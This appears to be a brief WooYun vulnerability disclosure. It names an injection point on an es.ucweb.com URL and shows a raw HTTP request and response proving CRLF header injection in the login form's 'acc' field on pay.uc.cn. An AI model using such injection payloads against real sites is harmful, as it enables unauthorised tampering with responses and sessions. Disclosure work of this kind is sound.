WooYun.org

注入点
http://es.ucweb.com/wor/my_brand?product_id=21870&type=0&la=

买一送一，再来个CRLF
CRLF
Request
POST /web/logon.htm HTTP/1.1
Content-Length: 114
Content-Type: application/x-www-form-urlencoded
Cookie: s=d65dec0be72c4b9aa7943fda45e2e083; ups_web=1; JSESSIONID=abc2V6ilSTUbSgZ1a0C-t; ups_web_acc=4111111111111111
Host: pay.uc.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept: */*
acc=%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs&lburl=%2fweb%2fmyAccount.htm&pwd=1&readed=true&remAcc=trueResponse
HTTP/1.1 200 OK
Date: Sun, 14 Jul 2013 11:04:56 GMT
Server: Apache
Set-Cookie: cookiename=value;Path=/;Domain=domainvalue;Max-Age=seconds;HTTPOnly
Set-Cookie: s=d65dec0be72c4b9aa7943fda45e2e083; path=/; expires=Sun, 14-Jul-2013 11:14:56 GMT
Set-Cookie: ups_web_acc=
SomeCustomInjectedHeader: injected_by_wvs; path=/; expires=Mon, 14-Jul-2014 11:04:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 7952
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive